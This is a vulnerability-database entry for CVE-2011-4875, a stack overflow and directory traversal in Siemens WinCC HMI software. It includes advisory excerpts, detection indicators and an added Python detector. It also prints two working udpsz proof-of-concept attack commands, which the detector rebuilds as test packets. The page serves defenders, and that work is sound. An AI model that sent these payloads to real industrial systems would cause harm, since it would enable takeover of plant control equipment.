CVE-2011-4875 (published 2012-02-03)
Priority P2 · 65 · Severity critical, 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public (see the exploit-db reference below)
EPSS: 14.01% (96.1st percentile)
Stack-based buffer overflow in HmiLoad in the runtime loader in Siemens WinCC flexible 2004, 2005, 2007, and 2008; WinCC V11 (aka TIA portal); the TP, OP, MP, Comfort Panels, and Mobile Panels SIMATIC HMI panels; WinCC V11 Runtime Advanced; and WinCC flexible Runtime, when Transfer Mode is enabled, allows remote attackers to execute arbitrary code via vectors related to Unicode strings.
Affected (11 ranges indexed; version bounds and fix versions were not captured)
| Vendor | Product | Ranges indexed | Version range | Fixed in |
|---|---|---|---|---|
| siemens | simatic_hmi_panels | 5 | not specified | none listed |
| siemens | wincc | 1 | not specified | none listed |
| siemens | wincc_flexible | 4 | not specified | none listed |
| siemens | wincc_runtime_advanced | 1 | not specified | none listed |
Detection & IOCs (extracted from sources)
PoC commands from the Auriemma advisory (udpsz syntax: -C "<hex>" [offset] places bytes at an offset, -b sets the fill byte, -T sends over TCP instead of UDP, followed by host, port and total packet size):
- Stack overflow (Bug A): udpsz -C "0004 03 00 00 00 00000000 00000000 00000000 00000000 00000000 ffffffff" -b a -T SERVER 2308 2+0x400
- HmiLoad directory traversal: udpsz -C "0004 03" 0 -C "01000000 80000000" 0x16 -c ".\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0.\0.\0/\0e\0v\0i\0l\0.\0e\0x\0e\0" 0x1e -T SERVER 2308 2+0x400
- miniweb: the byte 0xfa as the first byte of the URI triggers binary memory read mode.
Detection:
- Monitor traffic to port 2308 whose first two bytes are the HmiLoad header '0004' (the indexed indicators say UDP; the PoC commands above are sent with udpsz in TCP mode, -T, so watch both transports).
- Detect directory traversal attempts against miniweb (ports 80/443) using encoded backslashes (%5c) in HTTP GET requests, e.g. '..%5c..%5c' in the URI.
- Detect HTTP POST requests to miniweb whose URI begins with the byte 0xfa, which switches the server into the arbitrary memory read mode.
- Detect oversized Unicode string payloads sent to HmiLoad on port 2308: the overflow triggers when the 32-bit size field in the packet exceeds the 0x400-byte stack buffer (at EBP-0x418).
- Alert on HmiLoad packets to port 2308 containing Unicode-encoded '../' sequences (UTF-16LE, i.e. '.\0.\0/\0') in the filename field of write, read or delete operations.
Caveats:
- HmiLoad only exposes the vulnerable attack surface when Transfer Mode is explicitly enabled; systems not in Transfer Mode are not directly exposed to the stack overflow.
- No vendor fix was available at the time of disclosure; mitigations rely on network-level controls (firewall/ACL) blocking access to ports 2308, 4410, 80 and 443 on affected HMI systems.
- Code execution via the stack overflow (Bug A) is a two-stage attack: first corrupt memory beyond the 0x400-byte buffer using other packet types, then send a large string size to trigger SEH corruption.
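The following is an added example, not code from this page, from Siemens, or from the Auriemma advisory: a small detector for the HmiLoad and miniweb indicators listed above, run against packets rebuilt from the two udpsz PoC commands. The HmiLoad field layout it assumes (magic 0x0004 at offset 0, opcode byte at offset 2, 32-bit little-endian string length at offset 0x1a, UTF-16LE filename at offset 0x1e) is inferred from the byte offsets in those commands and is an assumption, not a documented protocol; the sample packets and HTTP request lines are constructed, not captured traffic.

```python
# Added example (not from this page, Siemens, or the Auriemma advisory).
# ASSUMPTION: HmiLoad field layout inferred from the udpsz PoC offsets above.
import struct

HMILOAD_PORT = 2308
STACK_BUF = 0x400      # stack buffer size named in the detection note above
MAGIC = b"\x00\x04"    # the "0004" header in both PoC commands
LEN_OFF = 0x1a         # assumed offset of the "ffffffff" / "80000000" dword
STR_OFF = 0x1e         # assumed start of the UTF-16LE filename


def build_udpsz_packet(chunks, fill=b"a", total=2 + 0x400):
    """Model udpsz: place (offset, bytes) chunks (-C/-c) on a fill byte (-b)
    inside a packet of `total` bytes (the 2+0x400 size argument)."""
    buf = bytearray(fill * total)
    for off, data in chunks:
        buf[off:off + len(data)] = data
    return bytes(buf[:total])


def analyze_hmiload_packet(pkt):
    """Return findings for one payload sent to port 2308 ([] if clean)."""
    findings = []
    if len(pkt) < STR_OFF or pkt[:2] != MAGIC:
        return findings                      # not HmiLoad framing
    opcode = pkt[2]
    (slen,) = struct.unpack_from("<I", pkt, LEN_OFF)
    if slen > STACK_BUF:
        findings.append(
            f"hmiload: unicode length 0x{slen:x} exceeds 0x{STACK_BUF:x} "
            f"stack buffer (opcode 0x{opcode:02x}), stack overflow attempt")
    # Decode only the bytes actually present, even if slen claims more.
    avail = len(pkt) - STR_OFF
    raw = pkt[STR_OFF:STR_OFF + min(slen, avail)]
    name = raw.decode("utf-16-le", errors="replace").rstrip("\x00")
    if "../" in name or "..\\" in name:
        findings.append(f"hmiload: directory traversal in filename {name!r}")
    return findings


def analyze_miniweb_request(request_line):
    """Check one raw HTTP request line (bytes) for the two miniweb indicators."""
    findings = []
    parts = request_line.split(b" ", 2)
    if len(parts) < 2:
        return findings
    method, target = parts[0], parts[1]
    if method == b"POST" and target[:1] == b"\xfa":
        findings.append("miniweb: POST target starts with 0xfa (binary memory read mode)")
    if b"..%5c" in target.lower() or b"..\\" in target:
        findings.append("miniweb: encoded-backslash traversal in URI")
    return findings


# --- Constructed samples (rebuilt from the PoC commands; not captured traffic) ---
# First udpsz command: zeroed dwords, then 0xffffffff as the string length.
OVERFLOW_PKT = build_udpsz_packet(
    [(0, bytes.fromhex("000403000000" + "00000000" * 5 + "ffffffff"))],
    fill=b"a")

# Second udpsz command: length 0x80 at 0x1a, "../" steps + "evil.exe" in
# UTF-16LE at 0x1e. Zero fill is an assumption (that PoC does not pass -b).
TRAVERSAL_PKT = build_udpsz_packet(
    [(0, bytes.fromhex("000403")),
     (0x16, bytes.fromhex("0100000080000000")),
     (0x1e, ("../" * 11 + "evil.exe").encode("utf-16-le"))],
    fill=b"\x00")

# A plausible benign transfer: short filename with a consistent length field.
_benign_name = "screen1.pdz".encode("utf-16-le")
BENIGN_PKT = build_udpsz_packet(
    [(0, bytes.fromhex("000403")),
     (0x16, struct.pack("<II", 1, len(_benign_name))),
     (0x1e, _benign_name)],
    fill=b"\x00")

MINIWEB_SAMPLES = [
    b"GET /..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.0",   # constructed
    b"POST \xfa HTTP/1.0",                               # constructed
    b"GET /index.html HTTP/1.1",                         # constructed, benign
]

if __name__ == "__main__":
    for label, pkt in [("overflow", OVERFLOW_PKT), ("traversal", TRAVERSAL_PKT),
                       ("benign", BENIGN_PKT)]:
        print(label, analyze_hmiload_packet(pkt))
    for line in MINIWEB_SAMPLES:
        print(line, analyze_miniweb_request(line))
```

The length check deliberately compares the declared size field, not the bytes on the wire, because the overflow is driven by the declared size; decoding is then bounded by what the packet actually carries so the detector itself cannot be made to over-read. To use it on live traffic, feed it the payload of each port-2308 segment or datagram and each miniweb request line.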
GHSA
GHSA-v2qv-37fh-hjmr · ghsa_unreviewed · 2022-05-17 · CVE-2011-4875 · severity HIGH · CWE-119
Description identical to the CVE text above (stack-based buffer overflow in HmiLoad in the runtime loader of Siemens WinCC flexible 2004, 2005, 2007 and 2008; WinCC V11 (aka TIA portal); the TP, OP, MP, Comfort Panels and Mobile Panels SIMATIC HMI panels; WinCC V11 Runtime Advanced; and WinCC flexible Runtime, when Transfer Mode is enabled).
CISA ICS
Siemens SIMATIC WinCC Vulnerabilities (UPDATE A)
cisa_ics · 2011-12-22
Archived content: in an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory · Alert Code ICSA-12-030-01A · Last revised September 06, 2018
## Overview
This advisory is a follow-up to a previous advisory titled “ICSA-11-356-01 – Siemens HMI Authentication Vulnerabilities” that was published December 22, 2011, and an alert titled "ICS-ALERT-11-332-02A – Siemens SIMATIC WinCC Flexible Vulnerabilities" that was published December 2, 2011.
ICS-CERT has received reports from independent security researchers Billy Rios, Terry McCorkle, Shawn Merdinger, and Luigi Auriemma detailing several vulnerabilities in Siemens S
No detection rules found.
No writeups or analysis indexed.
References
- http://aluigi.org/adv/winccflex_1-adv.txt
- http://www.exploit-db.com/exploits/18166
- http://www.osvdb.org/77380
- http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-345442.pdf
- http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-332-02.pdf
- http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-332-02A.pdf
- http://www.us-cert.gov/control_systems/pdf/ICSA-12-030-01.pdf
- https://exchange.xforce.ibmcloud.com/vulnerabilities/71449
Published 2012-02-03